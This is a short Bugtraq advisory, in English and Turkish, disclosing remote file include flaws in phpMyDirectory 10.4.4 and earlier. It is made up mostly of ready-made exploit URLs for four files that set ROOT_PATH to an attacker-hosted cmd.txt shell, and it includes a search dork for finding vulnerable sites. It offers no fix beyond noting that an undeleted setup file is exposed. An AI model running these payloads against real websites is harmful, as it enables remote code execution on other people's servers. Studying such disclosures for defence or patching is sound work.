Bugtraq: phpMyDirectory <= 10.4.4 Multiple Remote File Include(new!)

[ajannhwt () hotmail com]

ENGLISH

# Title  :   phpMyDirectory <= 10.4.4 Multiple Remote File Include Vulnerabilities

# Dork   :   "powered by phpmydirectory"

# Author :   ajann

# greetz :   Nukedx,TheHacker 

# Exploit;

###  http://[target]/[path]/template/default/footer.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls

###  http://[target]/[path]/template/Yellow/footer.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls

###  http://[target]/[path]/defaults_setup.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls

### SOME; http://[target]/[path]/template/default/test/header.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls

# ajann,Turkey


TURKISH

# Ba&#351;l&#305;k          :   phpMyDirectory <= 10.4.4 Multiple Remote File Include Vulnerabilities
# Sözcük[Arama]   :   "powered by phpmydirectory"
# Aç&#305;&#287;&#305; Bulan     :   ajann
# greetz          :   Nukedx,TheHacker 
# Aç&#305;k bulunan dosyalar;

###  http://[target]/[path]/template/default/footer.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls
###  http://[target]/[path]/template/Yellow/footer.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls
###  http://[target]/[path]/defaults_setup.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls
### SOME; http://[target]/[path]/template/default/test/header.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls

Aç&#305;klama: 
Temalarda bulunan footer.php dosyas&#305; güvenlik aç&#305;&#287;&#305;na yol açmaktad&#305;r.Bu sayede uzaktan kod 
çal&#305;&#351;t&#305;r&#305;labilir.
defaults_setup.php kurulumdan sonra silinmemi&#351;se ayn&#305; aç&#305;k uygulanabilmektedir.
test/header.php bölümü ise bazen denk gelmektedir,ayn&#305; aç&#305;k bulunmaktad&#305;r.
Aç&#305;k 10.4.4 dahil alt sürümlerinde çal&#305;&#351;maktad&#305;r.

Thanks.